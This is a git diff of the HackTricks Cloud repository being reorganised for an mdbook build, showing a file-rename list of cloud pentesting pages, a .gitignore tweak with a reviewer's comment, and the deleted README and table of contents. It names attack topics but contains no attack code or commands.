src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-queue-privesc.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-servicebus-privesc.md (72%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-sql-privesc.md (59%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-storage-privesc.md (60%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md (85%) create mode 100644 src/pentesting-cloud/azure-security/az-services/README.md create mode 100644 src/pentesting-cloud/azure-security/az-services/az-acr.md rename pentesting-cloud/azure-security/az-services/az-app-services.md => src/pentesting-cloud/azure-security/az-services/az-app-service.md (66%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-application-proxy.md create mode 100644 src/pentesting-cloud/azure-security/az-services/az-arm-templates.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-automation-account/README.md (66%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-azuread.md (79%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-file-shares.md (58%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-function-apps.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-logic-apps.md (52%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md create mode 100644 
src/pentesting-cloud/azure-security/az-services/az-queue-enum.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-servicebus-enum.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-sql.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/az-storage.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-services/az-table-storage.md create mode 100644 src/pentesting-cloud/azure-security/az-services/intune.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/keyvault.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/vms/README.md (80%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-services/vms/az-azure-network.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-unauthenticated-enum-and-initial-entry/README.md (80%) create mode 100644 src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md rename {pentesting-cloud => src/pentesting-cloud}/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md (62%) create mode 100644 src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md create mode 100644 src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/README.md rename {pentesting-cloud => src/pentesting-cloud}/digital-ocean-pentesting/do-basic-information.md (73%) create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/README.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md create mode 100644 
src/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md rename {pentesting-cloud => src/pentesting-cloud}/digital-ocean-pentesting/do-services/do-droplets.md (57%) create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md create mode 100644 src/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/README.md (55%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-basic-information/README.md (73%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-permissions-for-a-pentest.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-persistence/README.md (100%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md create mode 100644 
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-persistence/gcp-non-svc-persistance.md (63%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/README.md (100%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md (76%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md (53%) rename {pentesting-cloud => 
src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md (52%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md (72%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md (55%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md (56%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/README.md (55%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md (64%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md rename 
{pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md (57%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md (58%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md (56%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md (77%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md (56%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md (54%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md (60%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md rename {pentesting-cloud => 
src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md (62%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md (50%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/README.md (100%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-app-engine-enum.md (59%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-artifact-registry-enum.md (54%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-bigquery-enum.md (64%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md create mode 100644 
src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-compute-instances-enum/README.md (63%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md (52%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-firebase-enum.md (59%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md (55%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-kms-enum.md (57%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-logging-enum.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-pub-sub.md (58%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-security-enum.md (53%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md 
rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-services/gcp-storage-enum.md (61%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-to-workspace-pivoting/README.md (68%) rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md (56%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md rename {pentesting-cloud => src/pentesting-cloud}/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md (65%) create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md create mode 
100644 src/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md create mode 100644 src/pentesting-cloud/ibm-cloud-pentesting/README.md create mode 100644 src/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md rename {pentesting-cloud => src/pentesting-cloud}/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md (62%) create mode 100644 src/pentesting-cloud/kubernetes-security/README.md rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md (71%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md (80%) create mode 100644 src/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md (72%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/exposing-services-in-kubernetes.md (67%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-basics.md (71%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-enumeration.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-external-secrets-operator.md (83%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-hardening/README.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md (83%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-kyverno/README.md (100%) rename {pentesting-cloud => 
src/pentesting-cloud}/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md (78%) create mode 100644 src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-network-attacks.md (61%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-opa-gatekeeper/README.md (100%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md (79%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-pivoting-to-clouds.md (64%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-role-based-access-control-rbac.md (62%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/kubernetes-validatingwebhookconfiguration.md (80%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/pentesting-kubernetes-services/README.md (70%) rename {pentesting-cloud => src/pentesting-cloud}/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md (55%) create mode 100644 src/pentesting-cloud/openshift-pentesting/README.md rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-basic-information.md (66%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-jenkins/README.md (93%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md (100%) create mode 100644 src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md (78%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md (71%) rename {pentesting-cloud => 
src/pentesting-cloud}/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md (92%) rename {pentesting-cloud => src/pentesting-cloud}/openshift-pentesting/openshift-scc.md (82%) rename {pentesting-cloud => src/pentesting-cloud}/pentesting-cloud-methodology.md (71%) create mode 100644 src/pentesting-cloud/workspace-security/README.md rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-google-platforms-phishing/README.md (56%) create mode 100644 src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md create mode 100644 src/pentesting-cloud/workspace-security/gws-persistence.md rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-post-exploitation.md (56%) create mode 100644 src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md (65%) rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md (80%) rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md (54%) rename {pentesting-cloud => src/pentesting-cloud}/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md (57%) create mode 100644 theme/book.js create mode 100644 theme/css/chrome.css create mode 100644 theme/css/general.css create mode 100644 theme/css/print.css create mode 100644 theme/css/variables.css create mode 100644 theme/favicon.png create mode 100644 theme/favicon.svg create mode 100644 theme/fonts/OPEN-SANS-LICENSE.txt create mode 100644 
theme/fonts/SOURCE-CODE-PRO-LICENSE.txt create mode 100644 theme/fonts/fonts.css create mode 100644 theme/fonts/open-sans-v17-all-charsets-300.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-300italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-600.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-600italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-700.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-700italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-800.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-800italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-italic.woff2 create mode 100644 theme/fonts/open-sans-v17-all-charsets-regular.woff2 create mode 100644 theme/fonts/source-code-pro-v11-all-charsets-500.woff2 create mode 100644 theme/highlight.css create mode 100644 theme/highlight.js create mode 100644 theme/ht_searcher.js create mode 100644 theme/index.hbs create mode 100644 theme/pagetoc.css create mode 100644 theme/pagetoc.js create mode 100644 theme/sponsor.js create mode 100644 theme/tabs.css create mode 100644 theme/tabs.js create mode 100644 theme/toc.js.hbs
diff --git a/.gitbook/assets/empty.zip b/.gitbook/assets/empty.zip
deleted file mode 100644
index 15cb0ecb3e219d1701294bfdf0fe3f5cb5d208e7..0000000000000000000000000000000000000000
GIT binary patch literal 0 HcmV?d00001 literal 22 NcmWIWW@Tf*000g10H*)|
diff --git a/.gitignore b/.gitignore
index 6826262d3..7fa947732 100644
--- a/.gitignore
+++ b/.gitignore
@@ -30,4 +30,9 @@ Icon
 .AppleDesktop
 Network Trash Folder
 Temporary Items
-.apdisk
\ No newline at end of file
+.apdisk
+
+#Mdbook
+book
+book/*
+hacktricks-preprocessor.log
diff --git a/README.md b/README.md
deleted file mode 100644
index 17db20c7d..000000000
--- a/README.md
+++ /dev/null
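Review bot: In the .gitignore hunk the two added patterns `book` and `book/*` overlap, and the bare `book` is not anchored to the repository root: it matches a file or directory of that name at any depth, so a future content path such as one under `src/` named `book` would be left untracked without warning. A single root-anchored directory pattern, `/book/`, covers the mdbook build output and nothing else. `hacktricks-preprocessor.log` could be anchored the same way as `/hacktricks-preprocessor.log` if the preprocessor only ever writes its log at the repository root, which this hunk does not show.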
@@ -1,67 +0,0 @@ -# HackTricks Cloud - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -
- -_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ - -{% hint style="success" %} -Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news. -{% endhint %} - -### **Pentesting CI/CD Methodology** - -**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-ci-cd/pentesting-ci-cd-methodology.md" %} -[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -{% endcontent-ref %} - -### Pentesting Cloud Methodology - -**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:** - -{% content-ref url="pentesting-cloud/pentesting-cloud-methodology.md" %} -[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md) -{% endcontent-ref %} - -### License & Disclaimer - -**Check them in:** - -{% content-ref url="https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq" %} -[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq) -{% endcontent-ref %} - -### Github Stats - -![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/SUMMARY.md b/SUMMARY.md
deleted file mode 100644
index 921ed2d3d..000000000
--- a/SUMMARY.md
+++ /dev/null
@@ -1,503 +0,0 @@ -# Table of contents - -## 👽 Welcome! - -* [HackTricks Cloud](README.md) -* [About the Author](https://book.hacktricks.xyz/welcome/about-the-author) -* [HackTricks Values & faq](https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq) - -## 🏭 Pentesting CI/CD - -* [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) -* [Github Security](pentesting-ci-cd/github-security/README.md) - * [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) - * [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) - * [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) - * [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) - * [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) - * [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) -* [Gitea Security](pentesting-ci-cd/gitea-security/README.md) - * [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) -* [Concourse Security](pentesting-ci-cd/concourse-security/README.md) - * [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) - * [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) - * [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) -* [CircleCI Security](pentesting-ci-cd/circleci-security.md) -* [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) - * [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) -* [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) - * [Basic Jenkins 
